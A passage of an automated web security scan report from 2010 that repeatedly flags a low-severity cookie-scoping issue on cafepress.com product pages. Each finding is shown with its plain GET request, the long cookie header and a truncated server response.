HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 52596
Date: Sun, 26 Dec 2010 13:48:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 52596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.62. http://www.cafepress.com/make/custom-t-shirts
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-t-shirts
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-t-shirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 112197
Date: Sun, 26 Dec 2010 13:47:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 112197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.63. http://www.cafepress.com/make/custom-thermos
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-thermos
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 55367
Date: Sun, 26 Dec 2010 13:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.64. http://www.cafepress.com/make/custom-water-bottles
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-water-bottles
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 58794 Date: Sun, 26 Dec 2010 13:47:53 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58794 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.65. http://www.cafepress.com/make/holiday-invitations
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/holiday-invitations
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/holiday-invitations HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 55521 Date: Sun, 26 Dec 2010 13:47:27 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55521 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.66. http://www.cafepress.com/make/holiday-photo-cards
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/holiday-photo-cards
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/holiday-photo-cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 58720 Date: Sun, 26 Dec 2010 13:47:27 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58720 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.67. http://www.cafepress.com/make/makeacard.aspx
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/makeacard.aspx
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/makeacard.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=utf-8 Location: /cp/bing/errorpage.html?aspxerrorpath=/make/makeacard.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Content-Length: 189 Date: Sun, 26 Dec 2010 13:48:17 GMT Connection: close Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private <html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fcp%2fbing%2ferrorpage.html%3faspxerrorpath%3d%2fmake%2fmakeacard.aspx">here</a>.</h2> </body></html>
2.68. http://www.cafepress.com/make/personalized-gifts
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/personalized-gifts
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/personalized-gifts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
